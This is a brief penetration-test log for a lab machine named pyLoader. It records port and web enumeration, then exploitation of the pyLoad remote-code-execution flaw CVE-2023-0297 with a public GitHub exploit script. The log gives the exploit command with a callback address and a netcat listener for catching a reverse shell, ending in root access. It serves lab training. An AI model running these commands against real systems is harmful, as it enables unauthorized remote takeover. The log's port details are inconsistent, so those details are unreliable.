pyLoader
๐งช Pentest Log: {{date:2025-08-02}}
๐ Target Information
- Machine Name: pyLoader
- IP Address: 192.168.223.26
- Operating System: Linux
ip=192.168.223.26
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 9666
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Google pyLoad exploit, found CVE-2023-0297
http://github.com/JacobEbben/CVE-2023-0297
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
python3 exploit.py -t http://$ip:9666 -I 192.168.45.163 -P 80
Catch the reverse shell using
nc -lvnp 80
๐งฌ Privilege Escalation
๐ค Current Access
- User: root
- Groups: root
- Shell Type: webshell